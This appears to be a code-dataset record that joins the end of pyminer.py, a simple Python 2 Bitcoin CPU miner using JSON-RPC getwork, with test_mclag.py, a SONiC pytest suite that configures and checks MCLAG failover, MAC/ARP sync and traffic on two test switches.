obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 42000
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_mclag.py
|
import csv
import json
import logging
import re
import random
import sys
import time
import threading
import Queue
import ipaddr as ipaddress
import pytest
from ansible_host import AnsibleHost
from common.devices import SonicHost
from common.utilities import wait_until
from natsort import natsorted
from ptf_runner import ptf_runner
sys.path.append("../ansible/library")
import topo_facts
# global vars
g_vars = {}
test_scenario = "l2"
testbed_mtu = 8100 # set mclag keepalive intf mtu, the value should be less than your testbed's Trunk port(which connect to root fanout swich) mtu.
mclag_local_ip = ipaddress.IPNetwork("10.100.0.1/30")
mclag_peer_ip = ipaddress.IPNetwork("{}/{}".format(mclag_local_ip.ip+1, mclag_local_ip.prefixlen))
# SSH defines
SONIC_SSH_PORT = 22
SONIC_SSH_REGEX = 'OpenSSH_[\\w\\.]+ Debian'
class TBInfo(object):
"""
Parse the CSV file used to describe whole testbed info
Please refer to the example of the CSV file format
CSV file first line is title
The topology name in title is using uniq-name | conf-name
"""
def __init__(self, testbed_file):
self.testbed_filename = testbed_file
self.testbed_topo = {}
with open(self.testbed_filename) as f:
topo = csv.DictReader(f)
for line in topo:
tb_prop = {}
name = ''
for key in line:
if ('uniq-name' in key or 'conf-name' in key) and '#' in line[key]:
### skip comment line
continue
elif 'uniq-name' in key or 'conf-name' in key:
name = line[key]
elif 'ptf_ip' in key and line[key]:
ptfaddress = ipaddress.IPNetwork(line[key])
tb_prop['ptf_ip'] = str(ptfaddress.ip)
tb_prop['ptf_netmask'] = str(ptfaddress.netmask)
else:
tb_prop[key] = line[key]
if name:
self.testbed_topo[name] = tb_prop
# functions
def continuous_traffic_check(casename, event, ptf_runner, exc_queue, **kwargs):
'''
With this simple warpper function, we could use a Queue to store the
exception infos and check it later in main thread.
Example:
refer to test warm_reboot
'''
while True:
try:
log_file = "/tmp/mclag/log/mclag_{}_[{}]_[{}]_{}.log".format(test_scenario, casename, sys._getframe().f_code.co_name, time.strftime("%H%M%S"))
ptf_runner(log_file=log_file, **kwargs)
except Exception:
exc_queue.put(sys.exc_info())
if not event.is_set():
break
def check_teamd_status(host, addr=None, status='up', ptf=False, base=0, select=True):
if ptf:
for lag in g_vars['mclag_interfaces']:
lag_id = int(lag.strip("PortChannel"))
state = host.shell("teamdctl PortChannel{} state dump".format(lag_id))['stdout']
port = base + (lag_id - 1)
server_port_status = json.loads(state)['ports']['eth{}'.format(port)]['runner']['selected']
logging.info("Device: {}, status: {}, expect: {}".format(lag, server_port_status, select))
if server_port_status == select:
continue
else:
return False
else:
for lag in g_vars['mclag_interfaces']:
sys_id = host.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
logging.info("Device: {}, dev_addr: {}".format(lag, sys_id))
if sys_id != addr:
return False
else:
continue
time.sleep(30)
for lag in g_vars['mclag_interfaces']:
lag_status = host.shell("redis-cli -n 0 hget LAG_TABLE:{} oper_status".format(lag))['stdout']
logging.info("Device: {}, oper_status: {}".format(lag, lag_status))
if lag_status != status:
return False
else:
continue
return True
def check_warm_status(host):
finalizer_state = host.shell("systemctl is-active warmboot-finalizer.service", module_ignore_errors=True)['stdout']
if finalizer_state == 'inactive':
return True
else:
return False
# FIXME later may move to "common.reboot"
#
# The reason to introduce a new 'reboot' here is due to
# the difference of fixture 'localhost' between the two 'reboot' functions.
#
# 'common.reboot' request *ansible_fixtures.localhost*,
# but here it request *common.devices.Localhost*.
def reboot(duthost, localhost, delay=10, timeout=180, wait=120, basic_check=True):
"""
cold reboots DUT
:param duthost: DUT host object
:param localhost: local host object
:param delay: delay between ssh availability checks
:param timeout: timeout for waiting ssh port state change
:param wait: time to wait for DUT to initialize
:param basic_check: check duthost.critical_services_fully_started after DUT initialize
:return:
"""
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
duthost.shell("nohup reboot &")
logging.info('waiting for ssh to drop')
res = localhost.wait_for(host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
if res.is_failed:
raise Exception('DUT did not shutdown')
# TODO: add serial output during reboot for better debuggability
# This feature requires serial information to be present in
# testbed information
logging.info('waiting for ssh to startup')
res = localhost.wait_for(host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
if res.is_failed:
raise Exception('DUT did not startup')
logging.info('ssh has started up')
logging.info('waiting for switch to initialize')
time.sleep(wait)
if basic_check:
assert wait_until(timeout, 10, duthost.critical_services_fully_started), \
"All critical services should fully started!{}".format(duthost.CRITICAL_SERVICES)
# fixtures
@pytest.fixture(scope="module")
def localhost(testbed_devices):
return testbed_devices['localhost']
@pytest.fixture(scope="module")
def duthost2(ansible_adhoc, request):
"""
Shortcut fixture for getting DUT2 host
"""
tbname = request.config.getoption("--testbed")
tbfile = request.config.getoption("--testbed_file")
tbinfo = TBInfo(tbfile)
hostname2 = tbinfo.testbed_topo[tbname+'-dut2']['dut']
return SonicHost(ansible_adhoc, hostname2, gather_facts=True)
@pytest.fixture(scope="module", autouse=True)
def setup_init(testbed, duthost, duthost2, ptfhost, localhost):
global g_vars
# get dut origin router-mac
g_vars.update({'dut1_router_mac': duthost.shell("redis-cli -n 4 hget 'DEVICE_METADATA|localhost' mac")['stdout']})
g_vars.update({'dut2_router_mac': duthost2.shell("redis-cli -n 4 hget 'DEVICE_METADATA|localhost' mac")['stdout']})
tp_facts = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'])
tp_facts_dut1 = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'] + "_dut1")
tp_facts_dut2 = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'] + "_dut2")
# get mclag topo info
g_vars.update({'mclag_interconnection_interfaces': tp_facts['devices_interconnect_interfaces'].values()})
g_vars.update({'mclag_link_server_interfaces': tp_facts['host_interfaces']})
g_vars.update({'mclag_link_vm_interfaces': tp_facts['link_vm_interfaces']})
# get dut topo info
g_vars.update({'dut1_interconnection_interfaces': [p for port in tp_facts_dut1['devices_interconnect_interfaces'].values() for p in port]})
g_vars.update({'dut1_link_server_interfaces': tp_facts_dut1['host_interfaces']})
g_vars.update({'dut1_link_vm_interfaces': tp_facts_dut1['link_vm_interfaces']})
g_vars.update({'dut1_all_interfaces': g_vars['dut1_link_server_interfaces'] + g_vars['dut1_interconnection_interfaces'] + g_vars['dut1_link_vm_interfaces']})
g_vars.update({'dut2_interconnection_interfaces': [p for port in tp_facts_dut2['devices_interconnect_interfaces'].values() for p in port]})
g_vars.update({'dut2_link_server_interfaces': [p for p in g_vars['mclag_link_server_interfaces'] if p not in g_vars['dut1_link_server_interfaces']]})
g_vars.update({'dut2_link_vm_interfaces': [p for p in g_vars['mclag_link_vm_interfaces'] if p not in g_vars['dut1_link_vm_interfaces']]})
g_vars.update({'dut2_all_interfaces': g_vars['dut2_link_server_interfaces'] + g_vars['dut2_interconnection_interfaces'] + g_vars['dut2_link_vm_interfaces']})
# get dut1/dut2 port_alisa
dut1_hwsku = duthost.shell("show platform summary |grep HwSKU|awk '{print $2}'")['stdout']
dut2_hwsku = duthost2.shell("show platform summary |grep HwSKU|awk '{print $2}'")['stdout']
g_vars.update({'dut1_port_alias': duthost.port_alias(hwsku=dut1_hwsku)['ansible_facts']})
g_vars.update({'dut2_port_alias': duthost2.port_alias(hwsku=dut2_hwsku)['ansible_facts']})
# get dut1/dut2 port_ptf_indices
g_vars.update({'dut1_orphan_ports': g_vars['dut1_link_server_interfaces'][len(g_vars['dut1_link_server_interfaces'])/2-2:len(g_vars['dut1_link_server_interfaces'])/2] + \
g_vars['dut1_link_server_interfaces'][-2:]})
g_vars.update({'dut2_orphan_ports': g_vars['dut2_link_server_interfaces'][len(g_vars['dut2_link_server_interfaces'])/2-2:len(g_vars['dut2_link_server_interfaces'])/2] + \
g_vars['dut2_link_server_interfaces'][-2:]})
# init to ptf
ptfhost.shell("mkdir -p /tmp/mclag/log")
ptfhost.copy(src="ptftests", dest="/root")
ptfhost.script("scripts/remove_ip.sh")
ptfhost.script("scripts/change_mac.sh")
g_vars.update({'mclag_port_channel_id_list': range(1, len(g_vars['dut1_link_server_interfaces'])+1)})
ptf_mac_prefix = ptfhost.shell("ip -br link show eth0|awk '{print $3}'")['stdout'][:-2]
g_vars.update({'ptf_mac_prefix': ptf_mac_prefix})
g_vars.update({'dut1_server_mac': [(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list']]})
dut2_server_mac = [(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list'][:len(g_vars['mclag_port_channel_id_list'])/2-2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i+len(g_vars['dut1_all_interfaces'])-1)).upper() for i in g_vars['mclag_port_channel_id_list'][len(g_vars['mclag_port_channel_id_list'])/2-2:len(g_vars['mclag_port_channel_id_list'])/2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list'][len(g_vars['mclag_port_channel_id_list'])/2:-2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i+len(g_vars['dut1_all_interfaces'])-1)).upper() for i in g_vars['mclag_port_channel_id_list'][-2:]]
g_vars.update({'dut2_server_mac': dut2_server_mac})
for lag_id in g_vars['mclag_port_channel_id_list']:
ptf_extra_vars = {
'test_scenario' : test_scenario,
'item' : lag_id,
'ptf_mac_prefix' : g_vars['ptf_mac_prefix'],
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces']
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_ptf_port_channel_config_files.j2", dest="/tmp/mclag/PortChannel{}.conf".format(lag_id))
ptfhost.template(src="mclag/mclag_ptf_port_channel_startup.j2", dest="/tmp/mclag/mclag_ptf.sh", mode="u+rwx")
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario))
ptfhost.shell("/tmp/mclag/mclag_ptf.sh startup_portchannel_{}".format(test_scenario))
# init to dut
dut1_cfg = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout'])
dut2_cfg = json.loads(duthost2.shell("sonic-cfggen -d --print-data")['stdout'])
dut1_extra_vars = {
'test_scenario': test_scenario,
'mtu': testbed_mtu,
'mclag_local_ip': mclag_local_ip.ip,
'mclag_peer_ip': mclag_peer_ip.ip,
'dut_interconnection_interfaces': g_vars['dut1_interconnection_interfaces'],
'port_alias_map': g_vars['dut1_port_alias']['port_alias_map'],
'port_alias': g_vars['dut1_port_alias']['port_alias'],
'port_name_map': g_vars['dut1_port_alias']['port_name_map'],
'mclag_port_channel_id_list': g_vars['mclag_port_channel_id_list'],
'topology': tp_facts_dut1,
'cfg_origin': dut1_cfg
}
duthost.host.options['variable_manager'].extra_vars = dut1_extra_vars
duthost.template(src="mclag/mclag_configuration.j2", dest="/tmp/mclag_{}.json".format(test_scenario))
duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
duthost.shell("cp /tmp/mclag_{}.json /etc/sonic/config_db.json".format(test_scenario))
duthost.shell("systemctl enable iccpd")
reboot(duthost, localhost)
dut2_extra_vars = {
'test_scenario': test_scenario,
'mtu': testbed_mtu,
'mclag_local_ip': mclag_peer_ip.ip,
'mclag_peer_ip': mclag_local_ip.ip,
'dut_interconnection_interfaces': g_vars['dut2_interconnection_interfaces'],
'port_alias_map': g_vars['dut2_port_alias']['port_alias_map'],
'port_alias': g_vars['dut2_port_alias']['port_alias'],
'port_name_map': g_vars['dut2_port_alias']['port_name_map'],
'mclag_port_channel_id_list': g_vars['mclag_port_channel_id_list'],
'topology': tp_facts_dut2,
'cfg_origin': dut2_cfg,
'base': len(g_vars['dut1_all_interfaces'])
}
duthost2.host.options['variable_manager'].extra_vars = dut2_extra_vars
duthost2.template(src="mclag/mclag_configuration.j2", dest="/tmp/mclag_{}.json".format(test_scenario))
duthost2.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
duthost2.shell("cp /tmp/mclag_{}.json /etc/sonic/config_db.json".format(test_scenario))
duthost2.shell("systemctl enable iccpd")
reboot(duthost2, localhost)
g_vars.update({'mclag_domain_id': duthost.shell("mclagdctl dump state|grep 'Domain id'")['stdout'].split(":")[-1].strip()})
g_vars.update({'mclag_interfaces': natsorted(duthost.shell("mclagdctl dump state|grep 'MCLAG Interface'")['stdout'].split(": ")[-1].split(","))})
g_vars.update({'peer_link_interface': duthost.shell("mclagdctl dump state|grep 'Peer Link Interface'")['stdout'].split(":")[-1].strip()})
yield
# teardown on ptf
ptfhost.shell("/tmp/mclag/mclag_ptf.sh delete_portchannel{}".format("_"+test_scenario if test_scenario == "l2" else ""))
# teardown on dut
duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
duthost.shell("systemctl disable iccpd")
reboot(duthost, localhost)
duthost2.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
duthost2.shell("systemctl disable iccpd")
reboot(duthost2, localhost)
@pytest.fixture(scope="class", autouse=False)
def fdb_neigh_flush(duthost, duthost2):
duthost.shell("fdbclear; ip neigh flush all")
duthost2.shell("fdbclear; ip neigh flush all")
time.sleep(10)
@pytest.fixture(scope="function")
def basic_traffic_check(request, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, request.instance.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.fixture(scope="function")
def syncheck(request, duthost, duthost2):
orphan_ports = request.param['orphan_ports']
vlans = eval(duthost.shell("sonic-cfggen -d --var-json VLAN")['stdout']).keys()
res = False
for vlan in [v.split('Vlan')[-1] for v in vlans]:
for module in ['mac', 'arp']:
if module == 'mac':
cmd = "show mac -v %s|grep %s|awk '{print $3,$4}'" % (vlan, vlan)
elif module == 'arp':
cmd = "show arp|grep %s|awk '{print $1,$3}'" % vlan
dut1_port_item_map = {}
dut2_port_item_map = {}
dut1_entry = duthost.shell(cmd)['stdout_lines']
dut2_entry = duthost2.shell(cmd)['stdout_lines']
assert dut1_entry, "Can not get DUT1 {} entry".format(module)
assert dut2_entry, "Can not get DUT2 {} entry".format(module)
server_mac = g_vars['dut1_server_mac'] + g_vars['dut2_server_mac']
for entry in dut1_entry:
port = entry.split()[-1]
if (module == "mac" and entry.split()[0] in server_mac) or module == "arp":
item = entry.split()[0]
else :
continue
dut1_port_item_map[port].append(item) if port in dut1_port_item_map else dut1_port_item_map.update({port: [item]})
for entry in dut2_entry:
port = entry.split()[-1]
if (module == "mac" and entry.split()[0] in server_mac) or module == "arp":
item = entry.split()[0]
else :
continue
dut2_port_item_map[port].append(item) if port in dut2_port_item_map else dut2_port_item_map.update({port: [item]})
dut1_orphan_port_item = []
for port in dut1_port_item_map:
# check mclag interfaces
if "PortChannel" in port and port != g_vars['peer_link_interface']:
res = natsorted(dut1_port_item_map[port]) == natsorted(dut2_port_item_map[port])
assert res, "{} learned on mclag should be synced between mclag active and standby devices".format(module)
if orphan_ports:
dut1_orphan_port_item = []
for port in dut1_port_item_map:
if "Ethernet" in port:
for item in dut1_port_item_map[port]:
dut1_orphan_port_item.append(item)
res = natsorted(dut1_orphan_port_item) == natsorted(dut2_port_item_map[g_vars['peer_link_interface']])
# check DUT1 orphan ports
assert res, "{} learned on DUT1 orphan port should be pointed to peer link on DUT2".format(module)
dut2_orphan_port_item = []
for port in dut2_port_item_map:
if "Ethernet" in port:
for item in dut2_port_item_map[port]:
dut2_orphan_port_item.append(item)
res = natsorted(dut2_orphan_port_item) == natsorted(dut1_port_item_map[g_vars['peer_link_interface']])
# check DUT2 orphan ports
assert res, "{} learned on DUT2 orphan port should be pointed to peer link on DUT1".format(module)
class TestCase1_VerifyMclagStatus():
def test_check_keepalive_link(self, duthost, duthost2):
duthost.shell("ping {} -c 3 -f -W 2".format(mclag_peer_ip.ip))
status = duthost.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut1"
status = duthost2.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut2"
def test_check_teamd_system_id(self, duthost, duthost2):
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag standby device {} system ID shoule be same as active device".format(lag)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
pass
class TestCase2_MclagMemberPortStatusChange():
@pytest.fixture(scope="function")
def setup_mclag_interface_member(self, duthost, duthost2):
# shutdown active's port joined to first mclag interface and standby's port joined to last
dut1_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][0]))['stdout']
dut2_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][-1]))['stdout']
dut1_team_port = json.loads(dut1_team_cfg)['ports'].keys()
dut2_team_port = json.loads(dut2_team_cfg)['ports'].keys()
for port1, port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface shutdown {}".format(port1))
duthost2.shell("config interface shutdown {}".format(port2))
time.sleep(5)
yield
for port1,port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface startup {}".format(port1))
duthost2.shell("config interface startup {}".format(port2))
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_mclag_interface_member")
def test_mclag_member_port_down(self, duthost, duthost2, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": [int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1, len(g_vars['dut1_all_interfaces'])+int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1]
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# verify mac pointed to peer link after mclag member port down
# DUT1 mclag member port down
dut1_mac = (g_vars['ptf_mac_prefix']+"{:02x}".format(int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1))
dut1_port = duthost.shell("show mac|grep -i %s|awk '{print $4}'" % dut1_mac)['stdout']
assert dut1_port == g_vars['peer_link_interface'], \
"Mac {} on {} should be pointed to peer link after DUT1 mclag member port down".format(dut1_mac, g_vars['mclag_interfaces'][0])
# DUT2 mclag member port down
dut2_mac = (g_vars['ptf_mac_prefix']+"{:02x}".format(int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1))
dut2_port = duthost2.shell("show mac|grep -i %s|awk '{print $4}'" % dut2_mac)['stdout']
assert dut2_port == g_vars['peer_link_interface'], \
"Mac {} on {} should be pointed to peer link after DUT2 mclag member port down".format(dut2_mac, g_vars['mclag_interfaces'][-1])
# verify mac age flag changes after mclag member port down
# DUT1 mclag member port down
dut1_age_flag = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut1_mac))['stdout']
assert dut1_age_flag == "L", "Mac learned on DUT1 down port before should add 'L' flag"
dut2_age_flag = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut1_mac))['stdout']
assert dut2_age_flag == "P", "Mac learned from peer link on DUT2 should add 'P' flag"
# DUT2 mclag member port down
dut2_age_flag2 = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut2_mac))['stdout']
assert dut2_age_flag2 == "L", "Mac learned on DUT2 down port before should add 'L' flag"
dut1_age_flag2 = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut2_mac))['stdout']
assert dut1_age_flag2 == "P", "Mac learned from peer link on DUT1 should add 'P' flag"
# verify arp pointed to peer link after mclag member port down
# DUT1 mclag member port down
dut1_vmember = duthost.shell("sonic-cfggen -d --var-json VLAN_MEMBER")['stdout']
for k in json.loads(dut1_vmember):
if g_vars['mclag_interfaces'][0] in k:
vlan = k.split("|")[0]
dut1_vlan_intf = duthost.shell("sonic-cfggen -d --var-json VLAN_INTERFACE")['stdout']
for k in json.loads(dut1_vlan_intf):
if vlan+"|" in k:
vlan_ip = ipaddress.IPNetwork(k.split("|")[-1])
dut1_arp = vlan_ip.network + 256*int(g_vars['mclag_interfaces'][0].strip("PortChannel")) + 2
dut1_arp_port = duthost.shell("show arp|grep %s|awk '{print $3}'" % dut1_arp)['stdout']
assert dut1_arp_port == g_vars['peer_link_interface'], \
"Arp {} on {} should be pointed to peer link after DUT1 mclag member port down".format(dut1_arp, g_vars['mclag_interfaces'][0])
# DUT2 mclag member port down
dut2_vmember = duthost2.shell("sonic-cfggen -d --var-json VLAN_MEMBER")['stdout']
for k in json.loads(dut2_vmember):
if g_vars['mclag_interfaces'][-1] in k:
vlan = k.split("|")[0]
dut2_vlan_intf = duthost2.shell("sonic-cfggen -d --var-json VLAN_INTERFACE")['stdout']
for k in json.loads(dut2_vlan_intf):
if vlan+"|" in k:
vlan_ip = ipaddress.IPNetwork(k.split("|")[-1])
dut2_arp = vlan_ip.network + 256*int(g_vars['mclag_interfaces'][-1].strip("PortChannel")) + 2
dut2_arp_port = duthost2.shell("show arp|grep %s|awk '{print $3}'" % dut2_arp)['stdout']
assert dut2_arp_port == g_vars['peer_link_interface'], \
"Arp {} on {} should be pointed to peer link after DUT2 mclag member port down".format(dut2_arp, g_vars['mclag_interfaces'][-1])
def test_mclag_member_port_up(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase3_PeerLinkStatusChange():
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_peer_link_interface_down(self, duthost, duthost2, ptfhost, testbed):
duthost.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
duthost2.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
time.sleep(5)
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after peer link down"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut1_orphan_ports'] + g_vars['dut2_orphan_ports']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': False}], indirect=True)
def test_syncheck_on_mclag_interface(self, syncheck):
# verify mac and arp sync on mclag interfaces
pass
def test_peer_link_interface_up(self, duthost, duthost2, ptfhost, testbed):
duthost.shell("config interface startup {}".format(g_vars['peer_link_interface']))
